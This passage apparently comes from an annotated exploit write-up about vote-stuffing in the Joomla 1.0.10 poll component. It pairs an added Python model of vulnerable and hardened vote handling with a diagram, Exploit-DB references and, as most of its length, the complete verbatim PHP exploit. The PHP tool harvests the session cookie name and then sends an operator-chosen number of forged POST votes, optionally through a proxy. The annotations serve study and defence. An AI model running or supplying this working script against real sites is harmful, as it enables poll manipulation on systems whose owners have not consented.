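To make the "Secure Voting Mechanisms" and "Session Management" points concrete, an added example (Python; not Joomla!'s code and not from the original paper): a vulnerable vote handler that models the pattern the exploit's traffic defeats, beside a hardened one. The Request class, the POLLS table, the cookie name, the limits and the addresses are all constructed for the example, and the vulnerable model illustrates the flaw class rather than claiming how com_poll was implemented.

```python
import secrets
from collections import defaultdict, deque


class Request:
    """Minimal stand-in for an HTTP request: only what a vote handler looks at."""
    def __init__(self, remote_addr, now, query=None, form=None, cookies=None):
        self.remote_addr = remote_addr
        self.now = now                     # epoch seconds, passed in so behaviour is deterministic
        self.query = query or {}
        self.form = form or {}
        self.cookies = cookies or {}


# Constructed sample data: poll id -> option row ids (12 rows per poll, as in the text).
POLLS = {14: set(range(1, 13)), 15: set(range(13, 25))}
COOKIE_NAME = "a" * 32   # hypothetical session cookie name, standing in for the md5-derived one


def parse_vote(req):
    """Return (poll, option) or None if the option is not one of that poll's rows."""
    try:
        poll, option = int(req.query.get("id", 0)), int(req.form.get("voteid", 0))
    except ValueError:
        return None
    return (poll, option) if option in POLLS.get(poll, ()) else None


class VulnerableVotes:
    """Models the pattern the exploit traffic defeats (an illustration, not Joomla!'s code):
    the session id is taken from cookies or the query string alike, and an unknown id is
    treated as a first-time visitor who is handed a brand-new session with no history."""
    def __init__(self):
        self.sessions = {}                 # session id -> set of polls already voted on
        self.counts = defaultdict(int)

    def vote(self, req):
        parsed = parse_vote(req)
        if parsed is None:
            return "bad option"
        poll, option = parsed
        sid = req.cookies.get(COOKIE_NAME) or req.query.get(COOKIE_NAME)
        voted = self.sessions.get(sid)
        if voted is None:                  # never issued: start a fresh session, which has voted nowhere
            voted = self.sessions[secrets.token_hex(16)] = set()
        if poll in voted:
            return "already voted"
        voted.add(poll)
        self.counts[(poll, option)] += 1
        return "ok"


class HardenedVotes:
    """Server-issued session only (from the Cookie header, never query/form), a per-session
    CSRF token, vote state kept server-side, and a per-address cap on votes per window."""
    def __init__(self, per_ip_limit=3, window=3600):
        self.sessions = {}                 # sid -> {"csrf": token}
        self.voted = set()                 # (poll, sid) pairs, the authoritative record
        self.counts = defaultdict(int)
        self.ip_votes = defaultdict(deque)
        self.per_ip_limit, self.window = per_ip_limit, window

    def start_session(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"csrf": secrets.token_hex(16)}
        return sid

    def vote(self, req):
        parsed = parse_vote(req)
        if parsed is None:
            return "bad option"
        poll, option = parsed
        sess = self.sessions.get(req.cookies.get(COOKIE_NAME))
        if sess is None:
            return "no session"            # unknown or missing session is rejected, not created
        if not secrets.compare_digest(req.form.get("token", ""), sess["csrf"]):
            return "bad token"
        sid = req.cookies[COOKIE_NAME]
        if (poll, sid) in self.voted:
            return "already voted"
        recent = self.ip_votes[req.remote_addr]
        while recent and req.now - recent[0] > self.window:
            recent.popleft()
        if len(recent) >= self.per_ip_limit:
            return "rate limited"
        recent.append(req.now)
        self.voted.add((poll, sid))
        self.counts[(poll, option)] += 1
        return "ok"


def replay_exploit(handler, hits, now=0.0):
    """Send the script's request shape: no Cookie header, '<cookie name>=1' in the query."""
    for _ in range(hits):
        handler.vote(Request("203.0.113.7", now, query={"id": "14", COOKIE_NAME: "1"},
                             form={"voteid": "1"}))
    return handler.counts[(14, 1)]


if __name__ == "__main__":
    print("vulnerable:", replay_exploit(VulnerableVotes(), 200), "hardened:", replay_exploit(HardenedVotes(), 200))
```

The per-address cap is deliberately the last check: it protects against an attacker who does bother to fetch a fresh session before each vote, at the cost of limiting genuine voters behind one NAT address, which is the trade-off the IP-tracking bullet above refers to.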
ASCII visual
The exploit is a three-party interaction: the operator drives the PHP script through a browser, and the script talks to the target.

+--------------------+        +---------------------+        +--------------------------+
| Operator (browser) |        | Exploit script      |        | Target Joomla! 1.0.10    |
|                    |        | (PHP, attacker host)|        | server, com_poll         |
+--------------------+        +---------------------+        +--------------------------+
         |                              |                                  |
         | 1. form POST: host, path,    |                                  |
         |    pollid, voteid, hits      |                                  |
         |----------------------------->|                                  |
         |                              | 2. HEAD /path/index.php          |
         |                              |--------------------------------->|
         |                              | 3. headers incl. Set-Cookie:     |
         |                              |    <32hex>=...                   |
         |                              |<---------------------------------|
         |                              | 4. POST ...task=vote&id=P&<32hex>=1
         |                              |    body voteid=V, no Cookie header
         |                              |--------------------------------->|
         |                              | 5. redirect with Location header |
         |                              |<---------------------------------|
         |                              | 6. steps 4-5 repeated hits-1     |
         |                              |    times, one connection each    |
         |                              |<================================>|
         | 7. progress lines, "Exploit  |                                  |
         |    succeeded", results link  |                                  |
         |<-----------------------------|                                  |

Source references
- Paper URL: https://www.exploit-db.com/papers/2219
- Raw Exploit URL: https://www.exploit-db.com/raw/2219
- Joomla! Poll Component (vulnerable version): the paper links no vendor advisory. The target version (1.0.10) comes from the exploit's own description and the date (2006-08-19) from its milw0rm footer.
Original Exploit-DB Content (Verbatim)
<?php
# Joomla [poll component] add unlimited votes #
# Computer Security Researchers Institute #
# works regardless of php.ini settings #
# by trueend5 #
# [http://www.KAPDA.ir] #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo '<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Joomla [poll component] arbitrary add votes</title>
</head>
<body bgcolor="#FFCCFF">
<p align="center"><font size="4" color="#0000FF">Joomla [poll
component] arbitrary add votes</font></p>
<p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
<p align="center"><font size="4" color="#008000">Computer Security Researchers
Institute</font></p>
<font SIZE="3">
<p align="center"><b><a href="http://www.kapda.ir"><font color="#000000">KAPDA</font></a>.ir</b></p>
<p align="center"> </p>
</font>
<table width="90%">
<tbody>
<tr>
<td width="43%" align="left">
<form name="form1" action="'.$SERVER[PHP_SELF].'" method="post">
<p><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</font> hostname (ex: www.sitename.com)</span></p>
<p><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</font> path (ex: /joomla/
or just / )</span></p>
<p><input name="pollid" size="20"> <span class="Stile5"><font color="#FF0000">
*</font> pollid (ex: index.php?option=com_poll&task=results&<b><font size="4">id=14</font></b> )</span></p>
<p><input name="voteid" size="20"><span class="Stile5"><font color="#FF0000">
*</font> voteid ( <b><u>1</u></b> for first option, <b><u>2</u></b>
for second one , <b><u>3</u></b> for third and so... )</span></p>
<p><input name="hits" size="20"><span class="Stile5"><font color="#FF0000">
*</font>
hits ( number of votes that you want to add ) </span></p>
<p><input name="port" size="20"><span class="Stile5"> specify a port
(default: 80)</span></p>
<p><input name="proxy" size="20" ><span class="Stile5"> send exploit
through an HTTP proxy (ip:port)</span></p>
<p align="center"> <span class="Stile5"><font color="#FF0000">
* </font>fields are required</span></p>
<p align="center"><span class="Stile5">-----------------------------------------------------------------------------------------------</span></p>
<p><input type="submit" value="Start" name="Submit"></p>
</form></td></tr></tbody></table></body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket()
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
//echo nl2br(htmlentities($html));
}
$host=trim($_POST[host]);
$path=trim($_POST[path]);
$port=intval(trim($_POST[port]));
$pollid=intval(trim($_POST[pollid]));
$voteid=intval(trim($_POST[voteid]));
$hits=intval(trim($_POST[hits]));
if (($host<>'') and ($path<>'') and ($pollid<>'') and ($voteid<>'') and ($hits<>''))
{
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
if ($port=='') {$port=80;}
if ($hits=='') {$hits=200;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$livesite=$host;
if ($path=='/') {$livepath='';} else $livepath=substr("$path", 0, strlen($path)-1);
$sessionpath='http://'.$livesite.$livepath;
$packet="HEAD ".$p."index.php HTTP/1.1\r\n";
$packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
echo nl2br(htmlentities($html));
//trying to obtain cookiename from HEADER
$pattern="([a-z0-9]{32}=)";
if(preg_match($pattern, $html, $matches)) {$match=$matches[0];
$sessionCookieName=substr("$match", 0, strlen($match)-1);
} else
//trying to generate cookiename
{$sessionCookieName= md5( 'site'.$sessionpath );}
for ($t = 14; $t < $pollid; $t++) {$voteid=$voteid + 12;}
$data="voteid=".$voteid."";
$packet="POST ".$p."index.php?option=com_poll&task=vote&id=".$pollid."&".$sessionCookieName."=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);
echo nl2br(htmlentities($html));
if (!eregi("Location",$html)) {
echo "\n\nExploit failed..."; die();
}
else {
for ($n = 2; $n <= $hits; $n++) {
$data="voteid=".$voteid."";
$packet="POST ".$p."index.php?option=com_poll&task=vote&id=".$pollid."&".$sessionCookieName."=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!eregi("Location",$html)) {
echo "\n\nExploit failed..."; die();
}
echo "<br />".$n.":added.";
}
echo "<br /> Exploit succeeded <br />";
echo'<p align="center"><a href="'.$sessionpath.'/index.php?option=com_poll&task=results&id='.$pollid.'"><font color="#0000FF">Results</font></a></p>';
}
}
else
{echo 'Fill in requested fields, optionally specify a proxy';}
?>
# milw0rm.com [2006-08-19]